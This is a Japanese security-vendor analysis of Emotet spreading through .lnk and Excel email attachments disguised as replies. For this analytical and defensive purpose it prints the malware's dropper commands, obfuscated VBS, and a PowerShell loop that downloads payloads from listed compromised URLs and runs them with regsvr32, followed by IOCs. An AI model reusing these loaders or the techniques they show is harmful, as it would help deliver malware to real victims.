様々なファイルを通じて拡散する Emotet マルウェア

ASEC 分析チームは最近、Emotet マルウェアがリンクファイル(.lnk)を通じて拡散していることを確認した。Emotet マルウェアは過去から何度も拡散が続いており、4月からは Emotet ダウンローダーが Excel ファイルだけではなく、リンクファイル(.lnk)も使用していることが確認された。

確保した EML ファイルは、すべてユーザーのメールに対する返信であるかのように装ってマルウェアを配布するという共通点が見られる。

図1. 拡散しているメール1
図2. 拡散しているメール2
図3. 拡散しているメール3

[図1] メールに添付されている Excel ファイルの場合、以下のブログで共有したマクロシートを利用したタイプと同じ方式を使用している。

図4. Excel ドキュメント
図5. Excel ドキュメント内に存在する数式

ダウンロード URL は以下の通りである。

  • hxxp://easiercommunications[.]com/wp-content/w/
  • hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
  • hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
  • hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
  • hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
  • hxxp://goonboy[.]com/goonie/bSFz7Av/

Excel ファイルのほか lnk ファイルも多数が発見されており、大半が Invoice 関連のファイル名で拡散していることが確認されている。また、配布日付によって実行されるコマンドに違いがある。

確認日拡散ファイル名
04/26EXT Payment status.lnk
04/26Past Due invoice.lnk
04/28Electronic form.lnk
04/28detalles_28042022.lnk
04/29Address Changed.lnk
04/29Change of Address.lnk
05/02Payment with a new address.lnk
05/03INF_15823367.lnk
05/03MES_11845137690439733.lnk
表1. 確認された lnk ファイル名
  • Invoice # US-616121772.lnk

[図2]のメールに添付された Invoice # US-616121772.lnk ファイルの場合、開くと以下のコマンドが実行される。

cmd.exe /v:on /c findstr “glKmfOKnQLYKnNs.*” “Invoice # US-616121772.lnk”  > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

lnk ファイル下段には glKmfOKnQLYKnNs 文字列を始めとするスクリプトコードが存在するが、lnk ファイルを開くとこのコードを %TEMP% フォルダーの YlScZcZKeP.vbs ファイルに保存および実行する。

図6. lnk ファイル下段に存在するスクリプト

YlScZcZKeP.vbs ファイルは、内部に base64 でエンコードされた URL が存在し、この URL にアクセスしてさらなるマルウェアをダウンロードおよび実行する。

glKmfOKnQLYKnNs=1::on error resume next:Set FSO = CreateObject(“Scripting.FileSystemObject”)::Function Base64Decode(ByVal vCode):    With CreateObject(“Msxml2.DOMDocument.3.0”).CreateElement(“base64”):        .dataType = “bin.base64”:        .text = vCode:        Base64Decode = Stream_BinaryToString(.nodeTypedValue):    End With:End Function::Function Stream_BinaryToString(Binary):    With CreateObject(“ADODB.Stream”):        .Type = 1:        .Open:        .Write Binary:        .Position = 0:        .Type = 2:        .CharSet = “utf-8”:        Stream_BinaryToString = .ReadText:    End With:End Function::Dim LmPxinnpsd(6):::LmPxinnpsd(0) = “aHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2Iv”::LmPxinnpsd(1) = “aHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIv”::LmPxinnpsd(2) = “aHR0cDovL2RlbW8zNC5ja2cuaGsvc2VydmljZS9oaE1acmZDN01ubTlKRC8=”::LmPxinnpsd(3) = “aHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2Lw==”::LmPxinnpsd(4) = “aHR0cDovL2NpcHJvLm14L3ByZW5zYS9zaVpQNjlyQkZtaWJEdnVUUDFMLw==”::LmPxinnpsd(5) = “aHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8=”:::Execute(“dIm xml,Ws”&chr(-7328+7372)&”Db,FiLePaTH,u”&chr(6281-6199)&”L:”&chr(872280/7269)&”ml = “”MSXml2.SeRVERXmlht”&chr(-4790+4874)&”p.3″&chr(7943-7897)&”0″”:Ws = “”wscRipT.SHEll””:D”&chr(3908-3810)&” = “”aDo”&chr(-4831+4931)&”b.”&chr(7496-7413)&”TReam””:seT ImSHdnYd”&chr(-9735+9821)&”R =”&chr(-6409+6441)
<省略>
VBS コードの一部

ダウンロード URL は以下の通りである。

  • hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
  • hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
  • hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
  • hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
  • hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
  • hxxp://colegiounamuno[.]es/cgi-bin/E/

以降、ダウンロードしたファイルを %TEMP% フォルダーに KzcEXkekpr.Zvp というファイル名で保存したあと、‘%wInDiR% \sySTem32\regsVR32.Exe %tmp% \KZcEXkEkpR.ZVP’コマンドを通じて実行する。

  • 20220429_57092_005.lnk

[図3]のメールに添付されている 20220429_57092_005.lnk ファイルの場合、前述の lnk ファイルとは異なり、PowerShell コマンドを使用してさらなるファイルをダウンロードする。lnk ファイルを開くと以下の PowerShell コマンドを通じて Base64 でエンコードされたデータをデコードし、% TEMP% フォルダーに xLhSBgzPSx.ps1 で保存する。

C:\Windows\system32\cmd.exe /v:on /c fHjk4fTLlkc5DZfyorHstui9FxCd6xw3JieZWhdwrpiX+F4gEcRJCp5i1KXfjUxLJXU8QzW5||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c “&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(‘JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDo<中略>’)) > “%tmp%\xLhSBgzPSx.ps1”; powershell -executionpolicy bypass -file “$env:TEMP\xLhSBgzPSx.ps1”; Remove-Item -Force “$env:TEMP\xLhSBgzPSx.ps1″}”
実行コマンドの一部
$ProgressPreference="SilentlyContinue";$links=("hxxp://gccon.in/UploadedFiles/UYtJNrT2llxy1/","hxxp://gakudou.com/photo06/hEu/","hxxp://giasotti.com/js/Khc6mb0zx4KoWX/","hxxp://plresende.com/pcinfor/cq/","hxxp://thomasmanton.com/wp-includes/owZnpWmH4D8j/","hxxp://gla.ge/old/PuVaff/");foreach ($u in $links) {try {IWR $u -OutFile $env:TEMP/jnURxtRmiO.SKh;Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh;break} catch { }}

ダウンロード URL は以下の通りである。

  • hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
  • hxxp://gakudou[.]com/photo06/hEu/
  • hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
  • hxxp://plresende[.]com/pcinfor/cq/
  • hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
  • hxxp://gla[.]ge/old/PuVaff/

以降、ダウンロードしたファイルを %TEMP% フォルダーに jnURxtRmiO.SKh というファイル名で保存したあと、‘Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh’コマンドを通じて実行する。

前述したダウンロード URL からは Emotet マルウェアがダウンロードされることが確認されている。Emotet マルウェアは、実行すると内部に存在する複数の C&C サーバアドレスに接続を試み、接続に成功すると攻撃者によるコマンドを受け取ってさらなるマルウェアダウンロード等の不正な振る舞いを実行することができる。

最近、emotet マルウェアが Excel ドキュメントだけでなく、様々なダウンローダーを通じて配布されているため、ユーザーの注意が必要である。

現在 AhnLab V3 製品は、当該ファイルに対して以下の通り検知している。

[ファイル検知]
Downloader/XLS.Emotet
LNK/Autorun.Gen
Trojan/LNK.Runner
Trojan/Win.Agent.R488899

[IOC]
c32c22fa90ad51747e9939f8e7abf4c0
fd37d5fecf99b16df331be14649ac09c
6e1da3039639bb9d40fc9d5d355062c2
c43d185691aaba7d1d196156a4a450f7
hxxp://easiercommunications[.]com/wp-content/w/
hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
hxxp://goonboy[.]com/goonie/bSFz7Av/
hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
hxxp://colegiounamuno[.]es/cgi-bin/E/
hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
hxxp://gakudou[.]com/photo06/hEu/
hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
hxxp://plresende[.]com/pcinfor/cq/
hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
hxxp://gla[.]ge/old/PuVaff/

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

0 0 votes
評価する
Subscribe
Notify of
guest

0 コメント
Inline Feedbacks
View all comments